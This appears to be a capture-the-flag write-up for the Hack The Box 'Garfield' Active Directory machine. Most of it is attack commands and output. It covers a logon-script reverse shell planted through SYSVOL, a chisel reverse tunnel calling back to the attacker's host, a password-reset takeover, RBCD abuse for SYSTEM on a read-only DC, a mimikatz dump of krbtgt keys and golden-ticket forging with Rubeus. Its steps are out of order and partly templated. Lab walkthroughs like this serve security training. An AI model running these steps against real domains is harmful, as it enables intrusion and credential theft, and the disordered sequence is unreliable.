HTB Garfield Machine
1) Enumerate SMB + AD and identify scriptPath abuse
Scan target services:
┌──(global_venv)─(w_11㉿kali)-[~/Desktop/htb/garfield]
└─$ nmap -sC -sV -Pn 10.129.21.254
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-11 08:01 UTC
Nmap scan report for 10.129.21.254
Host is up (0.021s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-11 16:01:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GARFIELD
| NetBIOS_Domain_Name: GARFIELD
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: garfield.htb
| DNS_Computer_Name: DC01.garfield.htb
| DNS_Tree_Name: garfield.htb
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-11T16:01:59+00:00
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after: 2026-08-15T01:10:36
|_ssl-date: 2026-04-11T16:02:38+00:00; +8h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-11T16:01:58
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m02s, deviation: 0s, median: 8h00m01s
A single host, DC01 (Windows Server 2019, build 17763), exposing the usual DC services plus RDP and WinRM; SMB signing is required, so relaying NTLM to it is off the table. The +8h clock skew matters: Kerberos rejects requests whose timestamp is more than 5 minutes off (KRB_AP_ERR_SKEW), so sync the attacker clock to the DC (ntpdate, or run the Kerberos tooling under faketime) before the getST and psexec steps.
Add host entries to /etc/hosts:
10.129.21.254 garfield.htb dc01.garfield.htb
10.129.21.254 dc01.garfield.htb DC01
10.129.21.254 rodc01.garfield.htb RODC01
(RODC01 is not on this address; it later turns out to sit on an internal 192.168.100.0/24 segment behind DC01 and is reached through a pivot. The entry only serves name resolution.)
Collect AD graph data with bloodhound-python:
proxychains bloodhound-python -u l.wilson_adm -p 'WhoKnows123!' -d garfield.htb -ns 10.129.87.8 -c All
From the BloodHound graph, j.arbuckle has write access over the Liz Wilson (l.wilson) user object, which includes the scriptPath attribute. scriptPath is the user's logon script, resolved relative to the NETLOGON share (SYSVOL\<domain>\scripts) of the authenticating DC, so anything placed there runs in l.wilson's context at her next logon.
2) Upload malicious logon script to SYSVOL
Create printerDetect.bat (reverse shell payload), then upload it:
cat > printerDetect.bat <<'EOF'
@echo off
powershell -e <base64 (UTF-16LE) encoded reverse shell one-liner, omitted>
EOF
┌──(global_venv)─(w_11㉿kali)-[~/Desktop/htb/garfield/solution]
└─$ smbclient //10.129.21.254/SYSVOL -U 'garfield.htb\j.arbuckle'%'Th1sD4mnC4t!@1978' -c 'cd garfield.htb\scripts; put printerDetect.bat'
putting file printerDetect.bat as \garfield.htb\scripts\printerDetect.bat (20.8 kb/s) (average 20.8 kb/s)
Start a listener on the attacker machine (the port must match the one in the encoded payload):
nc -lvnp 4444
3) Set scriptPath and get shell as l.wilson
With the payload in place and listening, I configured the target user's scriptPath attribute to point to the malicious script using bloodyAD:
bloodyAD -u j.arbuckle -p 'Th1sD4mnC4t!@1978' \
--host dc01.garfield.htb \
set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" \
scriptPath -v printerDetect.bat
The value is relative to NETLOGON, which is why the file was dropped into SYSVOL\garfield.htb\scripts. On the next background logon event for l.wilson the script executed and a reverse shell came back:
PS C:\Windows\system32> whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
garfield\l.wilson S-1-5-21-2502726253-3859040611-225969357-3105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
4) Abuse password reset rights and take over l.wilson_adm
With the foothold as l.wilson, I used that account's password-reset right over its admin-tier counterpart l.wilson_adm (a ForceChangePassword edge in BloodHound terms) to set a known password. Set-ADAccountPassword comes from the ActiveDirectory PowerShell module, available on the DC where the shell landed:
$newpass = ConvertTo-SecureString 'SomethingEasyy' -AsPlainText -Force
Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $newpass -Reset
Next, I authenticated as the compromised admin-tier account over WinRM with evil-winrm:
┌──(global_venv)─(w_11㉿kali)-[~/Desktop/htb/garfield/solution]
└─$ evil-winrm -i dc01.garfield.htb -u l.wilson_adm -p 'SomethingEasyy'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> ls
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> cd ..
*Evil-WinRM* PS C:\Users\l.wilson_adm> cd Desktop
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> ls
Directory: C:\Users\l.wilson_adm\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/11/2026 9:00 AM 34 user.txt
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> cat user.txt
3c7c3a3a1252bc8ee65abf5e6f8cf3ee
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop>
With the l.wilson_adm profile I retrieved the user flag. l.wilson_adm is a Tier 1 account (see the token in the next step) with control over the RODC01 computer object, so the next phase used it for a Resource-Based Constrained Delegation (RBCD) attack against the Read-Only Domain Controller RODC01 to obtain an administrative session there. Note that an RODC is not the domain: compromising it only yields the secrets it is allowed to cache, which is what the later Password Replication Policy and KeyList steps are about.
5) Perform RBCD Attack Against RODC01
I started by checking the privileges associated with the l.wilson_adm account:
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== =============================================
garfield\l.wilson_adm S-1-5-21-2502726253-3859040611-225969357-3107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
GARFIELD\Tier 1 Group S-1-5-21-2502726253-3859040611-225969357-3108 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
RODC01 is not reachable from the attacker machine (it sits on 192.168.100.0/24 behind DC01), so to run the Impacket tooling against it I needed a pivot. I uploaded chisel.exe to DC01 and tunnelled through it:
upload chisel.exe
On Kali I started a chisel server that accepts reverse tunnels:
chisel server -p 8000 --reverse
Then I ran the chisel client on DC01 to connect back and open a reverse SOCKS proxy (by default on 127.0.0.1:1080 on the Kali side, which is what /etc/proxychains4.conf must point at):
.\chisel.exe client 10.10.15.248:8000 R:socks
With the pivot up, I verified from DC01 that RODC01 resolves and answers, so that proxychained requests have somewhere to go:
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> ping RODC01.garfield.htb
Pinging RODC01.garfield.htb [192.168.100.2] with 32 bytes of data:
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.100.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
S4U2proxy needs a principal with an SPN as the "delegate-from" identity; a machine account is the easiest, because new computer objects get SPNs automatically. l.wilson_adm holds SeMachineAccountPrivilege (see the token above), so, subject to ms-DS-MachineAccountQuota, I provisioned a fake workstation WS01$ with Impacket's addcomputer:
┌──(global_venv)─(w_11㉿kali)-[~/…/garfield/solution/chisel/rubeus]
└─$ impacket-addcomputer 'garfield.htb/l.wilson_adm:SomethingEasyy' -dc-ip 10.129.21.254 -computer-name 'WS01$' -computer-pass 'wulala'
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account WS01$ with password wulala.
With the machine account in place, I abused l.wilson_adm's control over the RODC01 computer object and wrote WS01$ into RODC01$'s msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The attribute holds a security descriptor; a full-control ACE for WS01$ lets WS01$ use S4U2self followed by S4U2proxy to obtain service tickets to RODC01 on behalf of arbitrary users (except accounts in Protected Users or marked "sensitive and cannot be delegated"):
┌──(global_venv)─(w_11㉿kali)-[~/…/garfield/solution/chisel/rubeus]
└─$ impacket-rbcd -dc-ip 10.129.21.254 -action write -delegate-from 'WS01$' -delegate-to 'RODC01$' 'garfield.htb/l.wilson_adm:SomethingEasyy'
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] WS01$ can now impersonate users on RODC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] WS01$ (S-1-5-21-2502726253-3859040611-225969357-10601)
With delegation configured, impacket-getST performs S4U2self (a ticket to WS01$ in Administrator's name) and then S4U2proxy, which yields a service ticket for cifs/rodc01.garfield.htb as Administrator. The request goes to the writable KDC, DC01:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ impacket-getST -dc-ip 10.129.21.254 -spn cifs/rodc01.garfield.htb -impersonate Administrator 'garfield.htb/WS01$:wulala'
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_rodc01.garfield.htb@GARFIELD.HTB.ccache
I pointed KRB5CCNAME at the resulting credential cache so the Impacket tools pick it up:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ export KRB5CCNAME=Administrator@cifs_rodc01.garfield.htb@GARFIELD.HTB.ccache
Through proxychains I ran impacket-psexec with -k -no-pass so it authenticates with the cached ticket. The host in the target string (rodc01.garfield.htb) must match the ticket's SPN, while -target-ip supplies the internal address 192.168.100.2 that the SOCKS pivot actually connects to. This gave a SYSTEM shell on the read-only domain controller:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ proxychains impacket-psexec -k -no-pass garfield.htb/Administrator@rodc01.garfield.htb -dc-ip 10.129.21.254 -target-ip 192.168.100.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
[*] Requesting shares on 192.168.100.2.....
[*] Found writable share ADMIN$
[*] Uploading file lUUUvjBY.exe
[*] Opening SVCManager on 192.168.100.2.....
[*] Creating service kpPM on 192.168.100.2.....
[*] Starting service kpPM.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 [!] Press help for extra shell commands
... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
Microsoft Windows [Version 10.0.17763.8511]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Next, to keep a privileged path that does not depend on the short-lived RBCD ticket and to prepare for retrieving the domain hashes, I used bloodyAD over proxychains to add l.wilson_adm to the RODC Administrators group (presumably the group delegated local administration of RODC01 through its managedBy attribute; see the managedBy note further down).
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ proxychains bloodyAD --host 10.129.21.254 -d garfield.htb -u l.wilson_adm -p 'SomethingEasyy' add groupMember "RODC Administrators" "l.wilson_adm"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.21.254:389 ... OK
[+] l.wilson_adm added to RODC Administrators
8) Modify RODC Password Replication Policy (PRP)
An RODC only holds the secrets of accounts it is allowed to cache. Which accounts those are is controlled by two attributes on the RODC's computer object: msDS-RevealOnDemandGroup (allowed) and msDS-NeverRevealGroup (denied, and deny wins). The KeyList request for Administrator in step 10 only succeeds if Administrator is allowed and not denied, and by default Administrator is denied through its Administrators / Domain Admins memberships. So I used bloodyAD via proxychains to read and adjust both attributes on RODC01$. The commands below are in the generic template form I worked from; substitute $DC_IP=10.129.21.254, $DOMAIN=garfield.htb, l.wilson_adm's credentials, 'RODC01$' and CN=Administrator,CN=Users,DC=garfield,DC=htb:
# Read the current msDS-RevealOnDemandGroup value(s) so they can be preserved
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup
distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local
# Re-set the attribute to the previous value plus the admin account (set object replaces the whole value list, so every value to keep must be passed again)
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
# If the admin is denied (directly or via a group such as Administrators) in msDS-NeverRevealGroup, clear that attribute; set object with no -v removes all values
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' msDS-NeverRevealGroup
7) Dump krbtgt (RODC) key via Mimikatz
Next I needed the AES key of krbtgt_8245, the RODC-specific krbtgt account (every RODC gets its own krbtgt_<number> account, and tickets it issues carry that number in the kvno). Still holding the Administrator cifs ticket in KRB5CCNAME, I opened an evil-winrm session to RODC01 through proxychains with Kerberos auth (-r garfield.htb; --spn cifs so the cached cifs/ ticket is used instead of the default HTTP/ SPN), uploaded mimikatz and dumped the account's stored keys with lsadump::lsa /inject (privilege::debug first):
proxychains evil-winrm -i rodc01.garfield.htb -r garfield.htb --spn cifs
[proxychains] Strict chain ... 127.0.0.1:1080 ... rodc01.garfield.htb:5985 ... OK
*Evil-WinRM* PS C:\Windows\Temp> upload ../../../../../../usr/share/windows-resources/mimikatz/x64/mimikatz.exe
Info: Uploading /home/w_11/Desktop/htb/garfield/solution/../../../../../../usr/share/windows-resources/mimikatz/x64/mimikatz.exe to C:\Windows\Temp\mimikatz.exe
Data: 1807016 bytes of 1807016 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Administrator.GARFIELD\Documents> .\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt_8245" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::lsa /inject /name:krbtgt_8245
Domain : GARFIELD / S-1-5-21-2502726253-3859040611-225969357
RID : 00000643 (1603)
User : krbtgt_8245
* Primary
NTLM : 445aa4221e751da37a10241d962780e2
LM :
Hash NTLM: 445aa4221e751da37a10241d962780e2
ntlm- 0: 445aa4221e751da37a10241d962780e2
lm - 0: 0ab3d34a182bb016fc4cfd26544a9f16
* WDigest
01 6d31d1f92ef6d85f5517944f98bf5753
02 8c46bd5ddc680291e70800990dbc02e3
03 9ffbc24f29b9bb3df3c32b76631ff874
04 6d31d1f92ef6d85f5517944f98bf5753
05 8c46bd5ddc680291e70800990dbc02e3
06 8fc97c500bf9c7c4a0d34a497f9c5245
07 6d31d1f92ef6d85f5517944f98bf5753
08 c4bac61b7ecb407d358f836d2f4e19c6
09 c4bac61b7ecb407d358f836d2f4e19c6
10 d8938c80e1e0c80a2ec1d8b06f42cb31
11 67f002aa49f4400fa970a53e294f4bee
12 c4bac61b7ecb407d358f836d2f4e19c6
13 56062e2db43bc0069deb86de87509ca6
14 67f002aa49f4400fa970a53e294f4bee
15 7250fcfc09d9cb93345c0c1393e19e52
16 7250fcfc09d9cb93345c0c1393e19e52
17 04b30cd8b5381d4b8458b0c996503a91
18 b48bda9ef98982d5ee33766a74880e01
19 bb365cf4f0bcdadf35b6a9b04c58257b
20 85addbd6d603cca1b500f2da02b205d0
21 b6186618611e202aae4141716e6603f5
22 b6186618611e202aae4141716e6603f5
23 f3f6c9408db132bf8e59413b7b40bb16
24 0acf88cc5cb3b35888708ebefe658b6f
25 0acf88cc5cb3b35888708ebefe658b6f
26 08b8941632a5017e7178a3761dfaf7fb
27 c1b2fd89d0dafb5f9e18147042bdc433
28 712f0b6ed3b7eb7f6f135a1e298c4e09
29 bf8d51270f7f657079bb9744446d70cb
* Kerberos
Default Salt : GARFIELD.HTBkrbtgt_8245
Credentials
des_cbc_md5 : d540fe6192b9ecfe
* Kerberos-Newer-Keys
Default Salt : GARFIELD.HTBkrbtgt_8245
Default Iterations : 4096
Credentials
aes256_hmac (4096) : d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
aes128_hmac (4096) : 124c0fd09f5fa4efca8d9f1da91369e5
des_cbc_md5 (4096) : d540fe6192b9ecfe
* NTLM-Strong-NTOWF
Random Value : f4b51c2c0d006172304e31dbc6e0de6b
mimikatz(commandline) # exit
Bye!
An alternative to the RBCD path for taking over RODC01 is the managedBy attribute: on an RODC computer object, the principal named in managedBy is delegated local administration of that RODC (Administrator Role Separation), so with write access to RODC01$ one can simply point it at a controlled account:
bloodyAD --host 10.129.21.254 -d garfield.htb -u l.wilson_adm -p 'SomethingEasyy' set object 'RODC01$' managedBy -v 'CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb'
Name resolution for RODC01 from DC01 can be checked with nslookup (its address is on the internal segment):
nslookup RODC01.garfield.htb
6) Summary of the RBCD Execution
To consolidate the method executed in Step 5, the RBCD attack required the following sequence:
- Create a machine account you control: a fake workstation (WS01$) was added to the domain.
- Write RBCD from the controlled machine to the RODC target: the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on RODC01$ was updated.
- Request an impersonated service ticket to the RODC: S4U2self/S4U2proxy were abused with impacket-getST to obtain a cifs ticket as Administrator.
- Use the ticket and execute on the RODC: proxychains carried psexec.py, which consumed the Kerberos ticket to open an interactive SYSTEM session.
At this point you should have SYSTEM-level execution context on RODC01.
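To make the second bullet concrete, this is what impacket-rbcd actually stores in msDS-AllowedToActOnBehalfOfOtherIdentity: a self-relative security descriptor whose DACL holds one ACCESS_ALLOWED_ACE with full control (mask 0x000F01FF) for each delegate-from SID, with owner and group set to BUILTIN\Administrators. The Python below is an added example written for this page, not Impacket's own code (the constants mirror what its create_empty_sd / create_allow_ace helpers emit, which is an assumption about that tool): it builds the descriptor for the WS01$ SID printed above, and parses a descriptor back, which is also how the "[*] Accounts allowed to act on behalf of other identity" line is produced and how a defender can audit the attribute on every computer object.

```python
import base64
import struct

# Values impacket-rbcd writes (assumption based on its create_empty_sd / create_allow_ace helpers)
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL_MASK = 0x000F01FF
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
SD_HEADER_LEN = 20  # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl


def sid_to_bytes(sid: str) -> bytes:
    """Encode an S-1-5-... string as a binary SID (revision, count, 48-bit authority, LE sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, pos: int) -> str:
    """Decode the binary SID starting at buf[pos]."""
    revision, count = struct.unpack_from("<BB", buf, pos)
    authority = int.from_bytes(buf[pos + 2:pos + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, pos + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def build_rbcd_descriptor(delegate_from_sids) -> bytes:
    """Self-relative SD granting full control to every delegate-from SID (what -action write stores)."""
    aces = b""
    for sid in delegate_from_sids:
        sid_bytes = sid_to_bytes(sid)
        # ACE header: AceType, AceFlags, AceSize, then Mask and the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), FULL_CONTROL_MASK) + sid_bytes
    # ACL header: AclRevision=4 (ACL_REVISION_DS), Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(delegate_from_sids), 0) + aces
    owner = group = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    owner_off = SD_HEADER_LEN
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, group_off, 0, dacl_off)  # no SACL
    return header + owner + group + dacl


def parse_rbcd_descriptor(buf: bytes):
    """Return [(sid, mask), ...] for every access-allowed ACE in the descriptor's DACL."""
    _, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", buf, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", buf, dacl_off)
    pos = dacl_off + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", buf, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append((sid_from_bytes(buf, pos + 8), mask))
        pos += ace_size  # AceSize covers header, mask and SID
    return allowed


def ldap_value(buf: bytes) -> str:
    """Base64 form, as the attribute shows up in LDIF / ldapsearch output."""
    return base64.b64encode(buf).decode()


if __name__ == "__main__":
    ws01 = "S-1-5-21-2502726253-3859040611-225969357-10601"  # WS01$ SID from the impacket-rbcd output
    sd = build_rbcd_descriptor([ws01])
    print("msDS-AllowedToActOnBehalfOfOtherIdentity:: " + ldap_value(sd))
    for sid, mask in parse_rbcd_descriptor(sd):
        print("allowed to act on behalf: %s (mask 0x%08x)" % (sid, mask))
```

Because set/write operations replace the whole descriptor, a defender auditing this attribute should treat any SID in the parsed list that is not an expected front-end service account as suspicious, and an attacker who does not want to break existing delegation should parse the current value first and append to it.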
7) Dump krbtgt (RODC) key
In summary, this stage is two commands: a credential dump on RODC01 and a KeyList TGS request (the full runs, with output, are shown above and in step 10). Note that sekurlsa::logonpasswords only lists keys of sessions currently logged on; the krbtgt_8245 key was actually obtained with lsadump::lsa /inject /name:krbtgt_8245, which targets the account directly:
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/Garfield.htb /dc:DC01.garfield.htb /ticket:<forged RODC TGT from step 9>
9) Forge RODC Golden Ticket
Using the krbtgt_8245 AES256 key, I forged an RODC golden ticket with Rubeus from the Administrator session on RODC01: a TGT for Administrator encrypted and signed with the RODC's krbtgt key, with /rodcNumber:8245 so that the kvno identifies krbtgt_8245 and DC01 will validate the ticket with that key. The ticket is written to a .kirbi file rather than injected into the session:
*Evil-WinRM* PS C:\Users\Administrator.GARFIELD\Documents> .\Rubeus.exe golden /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357 /user:Administrator /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Build TGT
[*] Building PAC
[*] Domain : GARFIELD.HTB (GARFIELD)
[*] SID : S-1-5-21-2502726253-3859040611-225969357
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : garfield.htb
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
